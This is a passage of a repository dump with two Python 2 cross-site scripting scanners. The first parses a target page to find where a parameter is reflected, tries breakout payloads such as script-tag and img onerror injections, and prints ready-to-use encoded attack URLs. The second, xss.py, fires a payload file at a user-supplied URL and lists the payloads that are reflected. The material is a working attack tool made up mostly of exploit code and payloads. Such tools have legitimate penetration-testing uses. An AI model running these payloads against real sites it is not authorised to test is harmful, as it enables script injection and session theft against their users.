 95 |     elif(location == "attr"):
 96 |         print "[+] Found as an attribute in an HTML tag."
 97 |         break_attr()
 98 | 
 99 | def html_parse(init_resp):
100 |     parser = MyHTMLParser()
101 |     location = ""
102 |     try:
103 |         parser.feed(init_resp)
104 |     except Exception as e:
105 |         location = str(e)
106 |     except:
107 |         print "[-] ERROR. Try rerunning?"
108 |     return location
109 | 
110 | def test_param_check(param_to_check, param_to_compare):
111 |     check_string = "XSSSTART" + param_to_check + "XSSEND"
112 |     compare_string = "XSSSTART" + param_to_compare + "XSSEND"
113 |     check_url = URL.replace(XSSCHECKVAL, check_string)
114 |     try:
115 |         check_response = make_request(check_url)
116 |     except:
117 |         check_response = ""
118 |     success = False
119 |     
120 |     occurence_counter = 0
121 |     for m in re.finditer('XSSSTART', check_response, re.IGNORECASE):
122 |         occurence_counter += 1
123 |         if((occurence_counter == OCCURENCE_NUM) and (check_response[m.start():m.start()+len(compare_string)].lower() == compare_string.lower())):
124 |             success = True
125 |             break
126 |     return success
127 | 
128 | def make_request(in_url):
129 |     try:
130 |         req = urllib2.Request(in_url)
131 |         resp = urllib2.urlopen(req)
132 |         return resp.read()
133 |     except:
134 |         print "\n[-] ERROR Could not open URL. Exiting...\n"
135 | 
136 | def break_comment():
137 |     payload = "--><script>alert(1);</script>"
138 |     if(test_param_check(payload,payload)):
139 |         payload = "--><script>alert(1);</script>"
140 |         if(test_param_check(payload + "<!--",payload+"<!--")):
141 |             payload = "--><script>alert(1);</script><!--"
142 |     else:
143 |         if(test_param_check("-->", "-->")):
144 |             clean = test_param_check("<!--", "<!--")
145 |             found = False
146 |             for pl in FUZZING_PAYLOADS_BASE:
147 |                 pl = "-->" + pl
148 |                 if(clean):
149 |                     pl = pl + "<!--"
150 |                 if(test_param_check(urllib.quote_plus(pl), pl)):
151 |                     payload = pl
152 |                     LIST_OF_PAYLOADS.append(pl) #######################################################################################################################
153 |                     found = True
154 |                     break
155 |             if(not found):
156 |                 print "[-] ERROR. No successful fuzzing attacks. Check manually to confirm."
157 |         else:
158 |             payload = ""
159 |             print "[-] ERROR. Cannot escape comment because the --> string needed to close the comment is escaped."
160 |             
161 |     if(payload):
162 |         if(payload not in LIST_OF_PAYLOADS):
163 |             LIST_OF_PAYLOADS.append(payload)
164 |         print "[+] SUCCESS. Parameter was reflected in a comment. Use the following payload to break out:"
165 |         print payload
166 |         print "[+] Full URL Encoded: " + URL.replace(XSSCHECKVAL, urllib.quote_plus(payload))
167 |     
168 | def break_data():
169 |     payload = "<script>alert(1);</script>"
170 |     if("textarea" in CURRENTLY_OPEN_TAGS):
171 |         payload = "</textarea>" + payload
172 |     if("title" in CURRENTLY_OPEN_TAGS):
173 |         payload = "</title>" + payload
174 |     if(test_param_check(payload,payload)):
175 |         payload = payload
176 |     else:
177 |         found = False
178 |         for pl in FUZZING_PAYLOADS_BASE:
179 |                 if(test_param_check(urllib.quote_plus(pl), pl)):
180 |                     payload = pl
181 |                     found = True
182 |                     break
183 |         if(not found):
184 |             payload = ""
185 |             print "[-] ERROR. No successful fuzzing attacks. Check manually to confirm."
186 | 
187 |     if(payload):
188 |         if(payload not in LIST_OF_PAYLOADS):
189 |             LIST_OF_PAYLOADS.append(payload)
190 |         print "[+] SUCCESS. Parameter was reflected in data or plaintext. Use the following payload to break out:"
191 |         print payload
192 |         print "[+] Full URL Encoded: " + URL.replace(XSSCHECKVAL, urllib.quote_plus(payload))
193 | 
194 | def break_start_end_attr():
195 |     print "\n[Can tag attribute be escaped to execute XSS?]"
196 |     payload = "\"/><script>alert(1);</script>"
197 |     if(test_param_check(payload,payload)):
198 |         payload = "\"/><script>alert(1);</script>"
199 |         if(test_param_check(payload+"<br%20attr=\"", payload+"<br attr=\"")):
200 |             payload = "\"/><script>alert(1);</script><br attr=\""
201 |     else:
202 |         if(test_param_check("/>", "/>")):
203 |             clean = test_param_check("<br%20attr=\"", "<br attr=\"")
204 |             found = False
205 |             for pl in FUZZING_PAYLOADS_START_END_TAG:
206 |                 if(clean):
207 |                     pl = pl + "<br attr=\""
208 |                 if(test_param_check(urllib.quote_plus(pl), pl)):
209 |                     payload = pl
210 |                     found = True
211 |                     break
212 |             if(not found):
213 |                 payload = ""
214 |                 print "[-] No successful fuzzing attacks. Check manually to confirm."
215 |         else:
216 |             print "[-] WARNING. /> cannot be used to end the empty tag. Resorting to invalid HTML."
217 |             payloads_invalid = [
218 |                 "\"></" + OPEN_EMPTY_TAG + "><script>alert(1);</script>",
219 |                 "\"<div><script>alert(1);</script>"
220 |                 ]
221 |             found = False
222 |             for pl in payloads_invalid:
223 |                 if(test_param_check(urllib.quote_plus(pl), pl)):
224 |                     payload = pl
225 |                     found = True
226 |                     break
227 |             if(not found):
228 |                 payload = ""
229 |                 print "[-] ERROR! Cannot escape out of the attribute tag using all fuzzing payloads. Check manually to confirm."
230 |             
231 |     if(payload):
232 |         if(payload not in LIST_OF_PAYLOADS):
233 |             LIST_OF_PAYLOADS.append(payload)
234 |         print "[+] SUCCESS. Parameter was reflected in an attribute of an empty tag. Use the following payload to break out:"
235 |         print payload
236 |         print "[+] Full URL Encoded: " + URL.replace(XSSCHECKVAL, urllib.quote_plus(payload))
237 | 
238 | def break_attr():
239 |     payload = "\"></" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + "><script>alert(1);</script>"
240 |     if(test_param_check(payload,payload)):
241 |         if(test_param_check(payload + "<" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + "%20attr=\"", payload + "<" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + " attr=\"")):
242 |             payload = "\"></" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + "><script>alert(1);</script><" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + " attr=\""
243 |     else:
244 |         if(test_param_check("\">", "\">")):
245 |             clean_str = "<" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + " attr=\""
246 |             clean = test_param_check("<" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + "%20attr=\"", clean_str)
247 |             found = False
248 |             for pl in FUZZING_PAYLOADS_ATTR:
249 |                 if(clean):
250 |                     pl = pl + clean_str
251 |                 if(test_param_check(urllib.quote_plus(pl), pl)):
252 |                     payload = pl
253 |                     found = True
254 |                     break
255 |             if(not found):
256 |                 payload = ""
257 |                 print "[-] After trying all fuzzing attacks, none were successful. Check manually to confirm."
258 |         else:
259 |             print "[-] WARNING. \"> cannot be used to end the empty tag. Resorting to invalid HTML."
260 |             payloads_invalid = [
261 |                 "\"<div><script>alert(1);</script>",
262 |                 "\"</script><script>alert(1);</script>",
263 |                 "\"</><script>alert(1);</script>",
264 |                 "\"</><script>alert(1)</script>",
265 |                 "\"<><img src=\"blah.jpg\" onerror=\"alert('XSS')\"/>",
266 |                 ]
267 |             found = False
268 |             for pl in payloads_invalid:
269 |                 if(test_param_check(urllib.quote_plus(pl), pl)):
270 |                     payload = pl
271 |                     found = True
272 |                     break
273 |             if(not found):
274 |                 payload = ""
275 |                 print "[-] ERROR. Cannot escape out of the attribute tag using all fuzzing payloads. Check manually to confirm."
276 |             
277 |     
278 |     if(payload):
279 |         if(payload not in LIST_OF_PAYLOADS):
280 |             LIST_OF_PAYLOADS.append(payload)
281 |         print "[+] SUCCESS. Parameter was reflected in an attribute of an HTML tag. Use the following payload to break out:"
282 |         print payload
283 |         print "[+] Full URL Encoded: " + URL.replace(XSSCHECKVAL, urllib.quote_plus(payload))
284 |         
285 | #HTML Parser class
286 | class MyHTMLParser(HTMLParser):
287 |     def handle_comment(self, data):
288 |         global OCCURENCE_PARSED
289 |         if(XSSCHECKVAL.lower() in data.lower()):
290 |             OCCURENCE_PARSED += 1
291 |             if(OCCURENCE_PARSED == OCCURENCE_NUM):
292 |                 raise Exception("comment")
293 |     
294 |     def handle_startendtag(self, tag, attrs):
295 |         global OCCURENCE_PARSED
296 |         global OCCURENCE_NUM
297 |         global OPEN_EMPTY_TAG
298 |         if (XSSCHECKVAL.lower() in str(attrs).lower()):
299 |             OCCURENCE_PARSED += 1
300 |             if(OCCURENCE_PARSED == OCCURENCE_NUM):
301 |                 OPEN_EMPTY_TAG = tag
302 |                 raise Exception("start_end_tag_attr")
303 |             
304 |     def handle_starttag(self, tag, attrs):
305 |         global CURRENTLY_OPEN_TAGS
306 |         global OPEN_TAGS
307 |         global OCCURENCE_PARSED
308 |         #print CURRENTLY_OPEN_TAGS
309 |         if(tag not in TAGS_TO_IGNORE):
310 |             CURRENTLY_OPEN_TAGS.append(tag)
311 |         if (XSSCHECKVAL.lower() in str(attrs).lower()):
312 |             if(tag == "script"):
313 |                 OCCURENCE_PARSED += 1
314 |                 if(OCCURENCE_PARSED == OCCURENCE_NUM):
315 |                     raise Exception("script")
316 |             else:
317 |                 OCCURENCE_PARSED += 1
318 |                 if(OCCURENCE_PARSED == OCCURENCE_NUM):
319 |                     raise Exception("attr")
320 | 
321 |     def handle_endtag(self, tag):
322 |         global CURRENTLY_OPEN_TAGS
323 |         global OPEN_TAGS
324 |         global OCCURENCE_PARSED
325 |         if(tag not in TAGS_TO_IGNORE):
326 |             CURRENTLY_OPEN_TAGS.remove(tag)
327 |             
328 |     def handle_data(self, data):
329 |         global OCCURENCE_PARSED
330 |         if (XSSCHECKVAL.lower() in data.lower()):
331 |             OCCURENCE_PARSED += 1
332 |             if(OCCURENCE_PARSED == OCCURENCE_NUM):
333 |                 try:
334 |                     if(CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS)-1] == "script"):
335 |                         raise Exception("script_data")
336 |                     else:
337 |                         raise Exception("html_data")
338 |                 except:
339 |                     raise Exception("html_data")
340 | if __name__ == "__main__":
341 |     main()
342 | 


--------------------------------------------------------------------------------
/xss.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | fname = "payloads.txt"
 3 | with open(fname) as f:
 4 |     content = f.readlines()
 5 | # you may also want to remove whitespace characters like `\n` at the end of each line
 6 | payloads = [x.strip() for x in content] 
 7 | url = raw_input("URL: ")
 8 | vuln = []
 9 | for payload in payloads:
10 |     payload = payload
11 |     xss_url = url+payload
12 |     r = requests.get(xss_url)
13 |     if payload.lower() in r.text.lower():
14 |         print("Vulnerable: " + payload)
15 |         if(payload not in vuln):
16 |             vuln.append(payload)
17 |     else:
18 |         print "Not vulnerable!"
19 | 
20 | print "--------------------\nAvailable Payloads:"
21 | print '\n'.join(vuln)
22 | 
23 | 
24 | 


--------------------------------------------------------------------------------